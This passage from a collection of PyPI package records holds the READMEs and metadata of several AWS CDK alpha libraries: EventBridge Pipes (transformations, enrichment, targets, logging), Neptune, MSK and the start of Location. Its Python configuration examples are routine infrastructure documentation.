The dynamic field is extracted from the input event. The pipe variable is extracted from the pipe context. So when the following batch of input events is processed by the pipe ```json [ { ... "body": "{\"payload\": \"Test message.\"}", ... } ] ``` it is converted into the following payload: ```json [ { ... "staticField": "static value", "dynamicField": "Test message.", "pipeVariable": "MyPipe", ... } ] ``` If the transformation is applied to a target it might be converted to a string representation. For example, the resulting SQS message body looks like this: ```json [ { ... "body": "{\"staticField\": \"static value\", \"dynamicField\": \"Test message.\", \"pipeVariable\": \"MyPipe\"}", ... } ] ``` ### Example - input transformation from event path In cases where you want to forward only a part of the event to the target you can use the transformation event path. > This only works for targets because the enrichment needs to have a valid json as input. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue target_input_transformation = pipes.InputTransformation.from_event_path("$.body.payload") pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=SqsTarget(target_queue, input_transformation=target_input_transformation ) ) ``` This transformation extracts the body of the event. So when the following batch of input events is processed by the pipe ```json [ { ... "body": "\"{\"payload\": \"Test message.\"}\"", ... } ] ``` it is converted into the following target payload: ```json [ { ... "body": "Test message." ... } ] ``` > The [implicit payload parsing](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-input-transformation.html#input-transform-implicit) (e.g. SQS message body to JSON) only works if the input is the source payload. Implicit body parsing is not applied on enrichment results. 
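The event-path extraction and implicit payload parsing described above can be simulated in plain Python. The `resolve_event_path` helper below is hypothetical and greatly simplified (it only handles dotted paths), but it shows the intent:

```python
import json

def resolve_event_path(event, path):
    # Walk a '$.a.b' style path, JSON-decoding string values (such as
    # an SQS message body) on the way down -- a simplified model of
    # the implicit payload parsing applied to the source payload.
    current = event
    for part in path.lstrip("$.").split("."):
        if isinstance(current, str):
            current = json.loads(current)
        current = current[part]
    return current

event = {"body": json.dumps({"payload": "Test message."})}
assert resolve_event_path(event, "$.body.payload") == "Test message."
```

As the note above says, the real service only applies this implicit parsing to the source payload, not to enrichment results.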
### Example - input transformation from text In cases where you want to forward static text to the target or use your own formatted `inputTemplate` you can use the transformation from text. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue target_input_transformation = pipes.InputTransformation.from_text("My static text") pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=SqsTarget(target_queue, input_transformation=target_input_transformation ) ) ``` This transformation forwards the static text to the target. ```json [ { ... "body": "My static text" ... } ] ``` ## Enrichment In the enrichment step the (un)filtered payloads from the source can be used to invoke one of the following services: * API destination * Amazon API Gateway * Lambda function * Step Functions state machine * only express workflow ### Example enrichment implementation > Currently no implementation exists for any of the supported enrichments. The following example shows what an implementation can look like. The actual implementation is not part of this package and will be in a separate one. ```python @jsii.implements(pipes.IEnrichment) class LambdaEnrichment: def __init__(self, lambda_, props=None): self.lambda_ = lambda_ self.enrichment_arn = lambda_.function_arn self.input_transformation = props.input_transformation if props else None def bind(self, pipe): return pipes.EnrichmentParametersConfig( enrichment_parameters=cdk.aws_pipes.CfnPipe.PipeEnrichmentParametersProperty( input_template=self.input_transformation.bind(pipe).input_template if self.input_transformation else None ) ) def grant_invoke(self, pipe_role): self.lambda_.grant_invoke(pipe_role) ``` An enrichment implementation needs to provide the `enrichmentArn` and `enrichmentParameters`, and grant the pipe role invoke access to the enrichment.
### Example - enrichment usage ```python # source_queue: sqs.Queue # target_queue: sqs.Queue # enrichment_lambda: lambda.Function enrichment_input_transformation = pipes.InputTransformation.from_object({ "static_field": "static value", "dynamic_field": pipes.DynamicInput.from_event_path("$.body.payload"), "pipe_variable": pipes.DynamicInput.pipe_name }) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=SqsTarget(target_queue), enrichment=LambdaEnrichment(enrichment_lambda, { "input_transformation": enrichment_input_transformation }) ) ``` This example adds a lambda function as enrichment to the pipe. The lambda function is invoked with the batch of messages from the source after applying the transformation. The lambda function can return a result which is forwarded to the target. So when the following batch of input events is processed by the pipe ```json [ { ... "body": "{\"payload\": \"Test message.\"}", ... } ] ``` it is converted into the following payload, which is sent to the lambda function. ```json [ { ... "staticField": "static value", "dynamicField": "Test message.", "pipeVariable": "MyPipe", ... } ] ``` For example, a lambda function that returns a concatenation of the static field, dynamic field and pipe variable for each item of the batch ```python def handler(event, context): return [item["staticField"] + "-" + item["dynamicField"] + "-" + item["pipeVariable"] for item in event] ``` will produce the following target message in the target SQS queue. ```json [ { ... "body": "static value-Test message.-MyPipe", ... } ] ``` ## Target A target is the end of the pipe. After the payload from the source is pulled, filtered and enriched it is forwarded to the target.
For now the following targets are supported: * [API destination](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-api-destinations.html) * [API Gateway](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-api-gateway-target.html) * [Batch job queue](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-event-target.html#pipes-targets-specifics-batch) * [CloudWatch log group](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-event-target.html#pipes-targets-specifics-cwl) * [ECS task](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-event-target.html#pipes-targets-specifics-ecs-task) * Event bus in the same account and Region * Firehose delivery stream * Inspector assessment template * Kinesis stream * Lambda function (SYNC or ASYNC) * Redshift cluster data API queries * SageMaker Pipeline * SNS topic * SQS queue * Step Functions state machine * Express workflows (ASYNC) * Standard workflows (SYNC or ASYNC) The target event can be transformed before it is forwarded to the target using the same input transformation as in the enrichment step. ### Example target ```python # target_queue: sqs.Queue pipe_target = SqsTarget(target_queue) ``` ## Log destination A pipe can produce log events that are forwarded to different log destinations. You can configure multiple destinations, but all the destinations share the same log level and log data. For details check the official [documentation](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-logs.html). The log level and the data included in the log events are configured on the pipe class itself. The actual destination is defined independently, and there are three options: 1. `CloudwatchLogsLogDestination` 2. `FirehoseLogDestination` 3.
`S3LogDestination` ### Example log destination usage ```python # source_queue: sqs.Queue # target_queue: sqs.Queue # log_group: logs.LogGroup cwl_log_destination = pipes.CloudwatchLogsLogDestination(log_group) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=SqsTarget(target_queue), log_level=pipes.LogLevel.TRACE, log_include_execution_data=[pipes.IncludeExecutionData.ALL], log_destinations=[cwl_log_destination] ) ``` This example uses a CloudWatch Logs log group to store the log emitted during a pipe execution. The log level is set to `TRACE` so all steps of the pipe are logged. Additionally all execution data is logged as well. ## Encrypt pipe data with KMS You can specify that EventBridge use a customer managed key to encrypt pipe data stored at rest, rather than use an AWS owned key as is the default. Details can be found in the [documentation](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-encryption-pipes-cmkey.html). To do this, you need to specify the key in the `kmsKey` property of the pipe. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue # kms_key: kms.Key pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=SqsTarget(target_queue), kms_key=kms_key, # pipeName is required when using a KMS key pipe_name="MyPipe" ) ```
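Taken together, the stages of a pipe (poll source, filter, enrich, transform, deliver to target) follow a simple processing model. The sketch below is a conceptual plain-Python simulation with hypothetical stand-ins for each stage; it is not anything this package executes:

```python
def run_pipe(batch, filters=None, enrichment=None, transform=None):
    # Filter with OR semantics across the patterns, optionally enrich
    # the whole batch, then apply the input transformation per item.
    if filters:
        batch = [e for e in batch if any(f(e) for f in filters)]
    if enrichment:
        batch = enrichment(batch)
    if transform:
        batch = [transform(e) for e in batch]
    return batch

events = [{"customerType": "B2B", "payload": "hi"},
          {"customerType": "INTERNAL", "payload": "skip"}]
delivered = run_pipe(events,
                     filters=[lambda e: e["customerType"] in ("B2B", "B2C")],
                     transform=lambda e: e["payload"])
assert delivered == ["hi"]
```

Note how the enrichment sees the whole (filtered, transformed) batch at once, while the input transformation is applied item by item, matching the behavior described in the sections above.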
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:13.750676
aws_cdk_aws_pipes_alpha-2.239.0a0.tar.gz
137,572
6e/88/295273d1ddb9fdba2967e8352ecc3e1b102ac69cd2d532c5e6dcf253eb3b/aws_cdk_aws_pipes_alpha-2.239.0a0.tar.gz
source
sdist
null
false
ae2e73016129313292aef682ad9313bf
6b4130f01df7d36d633e19aa7fa1222e64febce049710c455c25a131f129e5af
6e88295273d1ddb9fdba2967e8352ecc3e1b102ac69cd2d532c5e6dcf253eb3b
null
[]
0
2.1
aws-cdk.aws-neptune-alpha
2.239.0a0
The CDK Construct Library for AWS::Neptune
# Amazon Neptune Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> Amazon Neptune is a fast, reliable, fully managed graph database service that makes it easy to build and run applications that work with highly connected datasets. The core of Neptune is a purpose-built, high-performance graph database engine. This engine is optimized for storing billions of relationships and querying the graph with millisecond latency. Neptune supports the popular graph query languages Apache TinkerPop Gremlin and W3C’s SPARQL, enabling you to build queries that efficiently navigate highly connected datasets. The `@aws-cdk/aws-neptune-alpha` package contains primitives for setting up Neptune database clusters and instances. ```python import aws_cdk.aws_neptune_alpha as neptune ``` ## Starting a Neptune Database To set up a Neptune database, define a `DatabaseCluster`. You must always launch a database in a VPC. ```python # vpc: ec2.Vpc cluster = neptune.DatabaseCluster(self, "Database", vpc=vpc, instance_type=neptune.InstanceType.R5_LARGE ) ``` By default, only a writer instance is provisioned with this construct. ## Connecting To control who can access the cluster, use the `.connections` attribute.
Neptune databases have a default port, so you don't need to specify the port: ```python cluster.connections.allow_default_port_from_any_ipv4("Open to the world") ``` The endpoints to access your database cluster will be available as the `.clusterEndpoint` and `.clusterReadEndpoint` attributes: ```python write_address = cluster.cluster_endpoint.socket_address ``` ## IAM Authentication You can also authenticate to a database cluster using AWS Identity and Access Management (IAM) database authentication; See [https://docs.aws.amazon.com/neptune/latest/userguide/iam-auth.html](https://docs.aws.amazon.com/neptune/latest/userguide/iam-auth.html) for more information and a list of supported versions and limitations. The following example shows enabling IAM authentication for a database cluster and granting connection access to an IAM role. ```python cluster = neptune.DatabaseCluster(self, "Cluster", vpc=vpc, instance_type=neptune.InstanceType.R5_LARGE, iam_authentication=True ) role = iam.Role(self, "DBRole", assumed_by=iam.AccountPrincipal(self.account)) # Use one of the following statements to grant the role the necessary permissions cluster.grant_connect(role) # Grant the role neptune-db:* access to the DB cluster.grant(role, "neptune-db:ReadDataViaQuery", "neptune-db:WriteDataViaQuery") ``` ## Customizing parameters Neptune allows configuring database behavior by supplying custom parameter groups. 
For more details, refer to the following link: [https://docs.aws.amazon.com/neptune/latest/userguide/parameters.html](https://docs.aws.amazon.com/neptune/latest/userguide/parameters.html) ```python cluster_params = neptune.ClusterParameterGroup(self, "ClusterParams", description="Cluster parameter group", parameters={ "neptune_enable_audit_log": "1" } ) db_params = neptune.ParameterGroup(self, "DbParams", description="Db parameter group", parameters={ "neptune_query_timeout": "120000" } ) cluster = neptune.DatabaseCluster(self, "Database", vpc=vpc, instance_type=neptune.InstanceType.R5_LARGE, cluster_parameter_group=cluster_params, parameter_group=db_params ) ``` Note: To use the Neptune engine versions `1.2.0.0` or later, including the newly added `1.4` series, it's necessary to specify the appropriate `engineVersion` prop in `neptune.DatabaseCluster`. Additionally, for the 1.2, 1.3, and 1.4 series, the corresponding `family` prop must be set to `ParameterGroupFamily.NEPTUNE_1_2`, `ParameterGroupFamily.NEPTUNE_1_3` or `ParameterGroupFamily.NEPTUNE_1_4` respectively in `neptune.ClusterParameterGroup` and `neptune.ParameterGroup`. ## Adding replicas `DatabaseCluster` allows launching replicas along with the writer instance. This can be specified using the `instances` attribute. ```python cluster = neptune.DatabaseCluster(self, "Database", vpc=vpc, instance_type=neptune.InstanceType.R5_LARGE, instances=2 ) ``` It is also possible to add replicas using `DatabaseInstance` for an existing cluster. ```python replica1 = neptune.DatabaseInstance(self, "Instance", cluster=cluster, instance_type=neptune.InstanceType.R5_LARGE ) ``` ## Automatic minor version upgrades By setting `autoMinorVersionUpgrade` to true, Neptune will automatically update the engine of the entire cluster to the latest minor version after a stabilization window of 2 to 3 weeks.
```python neptune.DatabaseCluster(self, "Cluster", vpc=vpc, instance_type=neptune.InstanceType.R5_LARGE, auto_minor_version_upgrade=True ) ``` You can also specify `autoMinorVersionUpgrade` to a database instance. Even within the same cluster, you can modify the `autoMinorVersionUpgrade` setting on a per-instance basis. ```python neptune.DatabaseInstance(self, "Instance", cluster=cluster, instance_type=neptune.InstanceType.R5_LARGE, auto_minor_version_upgrade=True ) ``` ## Port By default, Neptune uses port `8182`. You can override the default port by specifying the `port` property: ```python cluster = neptune.DatabaseCluster(self, "Database", vpc=vpc, instance_type=neptune.InstanceType.R5_LARGE, port=12345 ) ``` ## Logging Neptune supports various methods for monitoring performance and usage. One of those methods is logging 1. Neptune provides logs e.g. audit logs which can be viewed or downloaded via the AWS Console. Audit logs can be enabled using the `neptune_enable_audit_log` parameter in `ClusterParameterGroup` or `ParameterGroup` 2. Neptune provides the ability to export those logs to CloudWatch Logs ```python # Cluster parameter group with the neptune_enable_audit_log param set to 1 cluster_parameter_group = neptune.ClusterParameterGroup(self, "ClusterParams", description="Cluster parameter group", parameters={ "neptune_enable_audit_log": "1" } ) cluster = neptune.DatabaseCluster(self, "Database", vpc=vpc, instance_type=neptune.InstanceType.R5_LARGE, # Audit logs are enabled via the clusterParameterGroup cluster_parameter_group=cluster_parameter_group, # Optionally configuring audit logs to be exported to CloudWatch Logs cloudwatch_logs_exports=[neptune.LogType.AUDIT], # Optionally set a retention period on exported CloudWatch Logs cloudwatch_logs_retention=logs.RetentionDays.ONE_MONTH ) ``` For more information on monitoring, refer to https://docs.aws.amazon.com/neptune/latest/userguide/monitoring.html. 
For more information on audit logs, refer to https://docs.aws.amazon.com/neptune/latest/userguide/auditing.html. For more information on exporting logs to CloudWatch Logs, refer to https://docs.aws.amazon.com/neptune/latest/userguide/cloudwatch-logs.html. ## Metrics Both `DatabaseCluster` and `DatabaseInstance` provide a `metric()` method to help with cluster-level and instance-level monitoring. ```python # cluster: neptune.DatabaseCluster # instance: neptune.DatabaseInstance cluster.metric("SparqlRequestsPerSec") # cluster-level SparqlRequestsPerSec metric instance.metric("SparqlRequestsPerSec") # instance-level SparqlRequestsPerSec metric ``` For more details on the available metrics, refer to https://docs.aws.amazon.com/neptune/latest/userguide/cw-metrics.html. ## Copy tags to snapshot By setting `copyTagsToSnapshot` to true, all tags of the cluster are copied to the snapshots when they are created. ```python cluster = neptune.DatabaseCluster(self, "Database", vpc=vpc, instance_type=neptune.InstanceType.R5_LARGE, copy_tags_to_snapshot=True ) ``` ## Neptune Serverless You can configure a Neptune Serverless cluster using the dedicated instance type along with the `serverlessScalingConfiguration` property. > Visit [Using Amazon Neptune Serverless](https://docs.aws.amazon.com/neptune/latest/userguide/neptune-serverless-using.html) for more details. ```python cluster = neptune.DatabaseCluster(self, "ServerlessDatabase", vpc=vpc, instance_type=neptune.InstanceType.SERVERLESS, serverless_scaling_configuration=neptune.ServerlessScalingConfiguration( min_capacity=1, max_capacity=5 ) ) ```
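The engine-version note in the "Customizing parameters" section above has no accompanying example. The sketch below shows how an engine version might be pinned together with the matching parameter-group family; the exact `EngineVersion` member name (`V1_2_1_0` here) is an assumption for illustration, so check the generated API for the version you actually need:

```python
# vpc: ec2.Vpc
cluster_params = neptune.ClusterParameterGroup(self, "ClusterParams",
    description="Cluster parameter group for engine 1.2",
    family=neptune.ParameterGroupFamily.NEPTUNE_1_2,  # must match the engine version series
    parameters={
        "neptune_enable_audit_log": "1"
    }
)

cluster = neptune.DatabaseCluster(self, "Database",
    vpc=vpc,
    instance_type=neptune.InstanceType.R5_LARGE,
    engine_version=neptune.EngineVersion.V1_2_1_0,  # assumed member name
    cluster_parameter_group=cluster_params
)
```

If the `family` and `engineVersion` do not correspond to the same series, cluster creation fails, so the two settings should always be changed together.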
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:12.536423
aws_cdk_aws_neptune_alpha-2.239.0a0.tar.gz
132,086
a7/28/d99079aa7823245b5191998c651ba00fdf23431c7c1ecb7db2c0d18b651f/aws_cdk_aws_neptune_alpha-2.239.0a0.tar.gz
source
sdist
null
false
62e876fa1f60c558ede1722d80572ebe
e352725848740637ced6a12c095e4b06107274ae1a8a52df326663e0f5228465
a728d99079aa7823245b5191998c651ba00fdf23431c7c1ecb7db2c0d18b651f
null
[]
0
2.1
aws-cdk.aws-msk-alpha
2.239.0a0
The CDK Construct Library for AWS::MSK
# Amazon Managed Streaming for Apache Kafka Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> [Amazon MSK](https://aws.amazon.com/msk/) is a fully managed service that makes it easy for you to build and run applications that use Apache Kafka to process streaming data. The following example creates an MSK Cluster. ```python # vpc: ec2.Vpc cluster = msk.Cluster(self, "Cluster", cluster_name="myCluster", kafka_version=msk.KafkaVersion.V4_1_X_KRAFT, vpc=vpc ) ``` ## Allowing Connections To control who can access the Cluster, use the `.connections` attribute. For a list of ports used by MSK, refer to the [MSK documentation](https://docs.aws.amazon.com/msk/latest/developerguide/client-access.html#port-info). 
```python # vpc: ec2.Vpc cluster = msk.Cluster(self, "Cluster", cluster_name="myCluster", kafka_version=msk.KafkaVersion.V4_1_X_KRAFT, vpc=vpc ) cluster.connections.allow_from( ec2.Peer.ipv4("1.2.3.4/8"), ec2.Port.tcp(2181)) cluster.connections.allow_from( ec2.Peer.ipv4("1.2.3.4/8"), ec2.Port.tcp(9094)) ``` ## Cluster Endpoints You can use the following attributes to get a list of the Kafka broker or ZooKeeper node endpoints ```python # cluster: msk.Cluster CfnOutput(self, "BootstrapBrokers", value=cluster.bootstrap_brokers) CfnOutput(self, "BootstrapBrokersTls", value=cluster.bootstrap_brokers_tls) CfnOutput(self, "BootstrapBrokersSaslScram", value=cluster.bootstrap_brokers_sasl_scram) CfnOutput(self, "BootstrapBrokerStringSaslIam", value=cluster.bootstrap_brokers_sasl_iam) CfnOutput(self, "ZookeeperConnection", value=cluster.zookeeper_connection_string) CfnOutput(self, "ZookeeperConnectionTls", value=cluster.zookeeper_connection_string_tls) ``` ## Importing an existing Cluster To import an existing MSK cluster into your CDK app use the `.fromClusterArn()` method. ```python cluster = msk.Cluster.from_cluster_arn(self, "Cluster", "arn:aws:kafka:us-west-2:1234567890:cluster/a-cluster/11111111-1111-1111-1111-111111111111-1") ``` ## Client Authentication [MSK supports](https://docs.aws.amazon.com/msk/latest/developerguide/kafka_apis_iam.html) the following authentication mechanisms. ### TLS To enable client authentication with TLS set the `certificateAuthorityArns` property to reference your ACM Private CA. 
[More info on Private CAs.](https://docs.aws.amazon.com/msk/latest/developerguide/msk-authentication.html) ```python import aws_cdk.aws_acmpca as acmpca # vpc: ec2.Vpc cluster = msk.Cluster(self, "Cluster", cluster_name="myCluster", kafka_version=msk.KafkaVersion.V4_1_X_KRAFT, vpc=vpc, encryption_in_transit=msk.EncryptionInTransitConfig( client_broker=msk.ClientBrokerEncryption.TLS ), client_authentication=msk.ClientAuthentication.tls( certificate_authorities=[ acmpca.CertificateAuthority.from_certificate_authority_arn(self, "CertificateAuthority", "arn:aws:acm-pca:us-west-2:1234567890:certificate-authority/11111111-1111-1111-1111-111111111111") ] ) ) ``` ### SASL/SCRAM Enable client authentication with [SASL/SCRAM](https://docs.aws.amazon.com/msk/latest/developerguide/msk-password.html): ```python # vpc: ec2.Vpc cluster = msk.Cluster(self, "cluster", cluster_name="myCluster", kafka_version=msk.KafkaVersion.V4_1_X_KRAFT, vpc=vpc, encryption_in_transit=msk.EncryptionInTransitConfig( client_broker=msk.ClientBrokerEncryption.TLS ), client_authentication=msk.ClientAuthentication.sasl( scram=True ) ) ``` ### IAM Enable client authentication with [IAM](https://docs.aws.amazon.com/msk/latest/developerguide/iam-access-control.html): ```python # vpc: ec2.Vpc cluster = msk.Cluster(self, "cluster", cluster_name="myCluster", kafka_version=msk.KafkaVersion.V4_1_X_KRAFT, vpc=vpc, encryption_in_transit=msk.EncryptionInTransitConfig( client_broker=msk.ClientBrokerEncryption.TLS ), client_authentication=msk.ClientAuthentication.sasl( iam=True ) ) ``` ### SASL/IAM + TLS Enable client authentication with [IAM](https://docs.aws.amazon.com/msk/latest/developerguide/iam-access-control.html) as well as enable client authentication with TLS by setting the `certificateAuthorityArns` property to reference your ACM Private CA. 
[More info on Private CAs.](https://docs.aws.amazon.com/msk/latest/developerguide/msk-authentication.html) ```python import aws_cdk.aws_acmpca as acmpca # vpc: ec2.Vpc cluster = msk.Cluster(self, "Cluster", cluster_name="myCluster", kafka_version=msk.KafkaVersion.V4_1_X_KRAFT, vpc=vpc, encryption_in_transit=msk.EncryptionInTransitConfig( client_broker=msk.ClientBrokerEncryption.TLS ), client_authentication=msk.ClientAuthentication.sasl_tls( iam=True, certificate_authorities=[ acmpca.CertificateAuthority.from_certificate_authority_arn(self, "CertificateAuthority", "arn:aws:acm-pca:us-west-2:1234567890:certificate-authority/11111111-1111-1111-1111-111111111111") ] ) ) ``` ## Logging You can deliver Apache Kafka broker logs to one or more of the following destination types: Amazon CloudWatch Logs, Amazon S3, Amazon Data Firehose. To configure logs to be sent to an S3 bucket, provide a bucket in the `logging` config. ```python # vpc: ec2.Vpc # bucket: s3.IBucket cluster = msk.Cluster(self, "cluster", cluster_name="myCluster", kafka_version=msk.KafkaVersion.V4_1_X_KRAFT, vpc=vpc, logging=msk.BrokerLogging( s3=msk.S3LoggingConfiguration( bucket=bucket ) ) ) ``` When the S3 destination is configured, AWS will automatically create an S3 bucket policy that allows the service to write logs to the bucket. This makes it impossible to later update that bucket policy. To have CDK create the bucket policy so that future updates can be made, the `@aws-cdk/aws-s3:createDefaultLoggingPolicy` [feature flag](https://docs.aws.amazon.com/cdk/v2/guide/featureflags.html) can be used. This can be set in the `cdk.json` file. ```json { "context": { "@aws-cdk/aws-s3:createDefaultLoggingPolicy": true } } ``` ## Storage Mode You can configure an MSK cluster storage mode using the `storageMode` property. Tiered storage is a low-cost storage tier for Amazon MSK that scales to virtually unlimited storage, making it cost-effective to build streaming data applications. 
> Visit [Tiered storage](https://docs.aws.amazon.com/msk/latest/developerguide/msk-tiered-storage.html) > to see the list of compatible Kafka versions and for more details. ```python # vpc: ec2.Vpc cluster = msk.Cluster(self, "cluster", cluster_name="myCluster", kafka_version=msk.KafkaVersion.V4_1_X_KRAFT, vpc=vpc, storage_mode=msk.StorageMode.TIERED ) ``` ## MSK Express Brokers You can create an MSK cluster with Express Brokers by setting the `brokerType` property to `BrokerType.EXPRESS`. Express Brokers are a low-cost option for development, testing, and workloads that don't require the high availability guarantees of a standard MSK cluster. For more information, see [Amazon MSK Express Brokers](https://docs.aws.amazon.com/msk/latest/developerguide/msk-broker-types-express.html). **Note:** When using Express Brokers, the following constraints apply: * Apache Kafka version must be 3.6.x, 3.8.x, or 3.9.x * You must specify the `instanceType` * The VPC must have at least 3 subnets (across 3 AZs) * `ebsStorageInfo` is not supported * `storageMode` is not supported * `logging` is not supported * Supported broker sizes: `m7g.xlarge`, `m7g.2xlarge`, `m7g.4xlarge`, `m7g.8xlarge`, `m7g.12xlarge`, `m7g.16xlarge` ```python # vpc: ec2.Vpc express_cluster = msk.Cluster(self, "ExpressCluster", cluster_name="MyExpressCluster", kafka_version=msk.KafkaVersion.V3_8_X, vpc=vpc, broker_type=msk.BrokerType.EXPRESS, instance_type=ec2.InstanceType.of(ec2.InstanceClass.M7G, ec2.InstanceSize.XLARGE) ) ``` ## MSK Serverless You can also use MSK Serverless by using the `ServerlessCluster` class. MSK Serverless is a cluster type for Amazon MSK that makes it possible for you to run Apache Kafka without having to manage and scale cluster capacity. MSK Serverless requires IAM access control for all clusters. For more information, see [Use MSK Serverless clusters](https://docs.aws.amazon.com/msk/latest/developerguide/serverless-getting-started.html).
```python # vpc: ec2.Vpc serverless_cluster = msk.ServerlessCluster(self, "ServerlessCluster", cluster_name="MyServerlessCluster", vpc_configs=[msk.VpcConfig(vpc=vpc) ] ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:11.569392
aws_cdk_aws_msk_alpha-2.239.0a0.tar.gz
115,411
71/da/5593a829f78b1d02949e408c5196f2fe342ff71861bf9b0b3d1a33b5b5e5/aws_cdk_aws_msk_alpha-2.239.0a0.tar.gz
source
sdist
null
false
a528f73589d2b09082624a605b68c0b2
47f203ad8b8c92785aa791db065691e6b257d25c628e65bc0e230ec9598864eb
71da5593a829f78b1d02949e408c5196f2fe342ff71861bf9b0b3d1a33b5b5e5
null
[]
0
2.1
aws-cdk.aws-location-alpha
2.239.0a0
The CDK Construct Library for AWS::Location
# AWS::Location Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> This module is part of the [AWS Cloud Development Kit](https://github.com/aws/aws-cdk) project. Amazon Location Service lets you add location data and functionality to applications, which includes capabilities such as maps, points of interest, geocoding, routing, geofences, and tracking. Amazon Location provides location-based services (LBS) using high-quality data from global, trusted providers Esri and HERE. With affordable data, tracking and geofencing capabilities, and built-in metrics for health monitoring, you can build sophisticated location-enabled applications. ## Geofence Collection Geofence collection resources allow you to store and manage geofences—virtual boundaries on a map. You can evaluate locations against a geofence collection resource and get notifications when the location update crosses the boundary of any of the geofences in the geofence collection. 
```python # key: kms.Key location.GeofenceCollection(self, "GeofenceCollection", geofence_collection_name="MyGeofenceCollection", # optional, defaults to a generated name kms_key=key ) ``` Use the `grant()` or `grantRead()` method to grant the given identity permissions to perform actions on the geofence collection: ```python # role: iam.Role geofence_collection = location.GeofenceCollection(self, "GeofenceCollection", geofence_collection_name="MyGeofenceCollection" ) geofence_collection.grant_read(role) ``` ## Tracker A tracker stores position updates for a collection of devices. The tracker can be used to query the devices' current location or location history. It stores the updates, but reduces storage space and visual noise by filtering the locations before storing them. For more information, see [Trackers](https://docs.aws.amazon.com/location/latest/developerguide/geofence-tracker-concepts.html#tracking-overview). To create a tracker, define a `Tracker`: ```python # key: kms.Key location.Tracker(self, "Tracker", tracker_name="MyTracker", # optional, defaults to a generated name kms_key=key ) ``` Use the `grant()`, `grantUpdateDevicePositions()` or `grantRead()` method to grant the given identity permissions to perform actions on the tracker: ```python # role: iam.Role tracker = location.Tracker(self, "Tracker", tracker_name="MyTracker" ) tracker.grant_read(role) ``` If you want to associate a tracker with geofence collections, define a `geofenceCollections` property or use the `addGeofenceCollections()` method.
```python
# geofence_collection: location.GeofenceCollection
# geofence_collection_for_add: location.GeofenceCollection
# tracker: location.Tracker

tracker = location.Tracker(self, "Tracker",
    tracker_name="MyTracker",
    geofence_collections=[geofence_collection]
)

tracker.add_geofence_collections(geofence_collection_for_add)
```

## API key

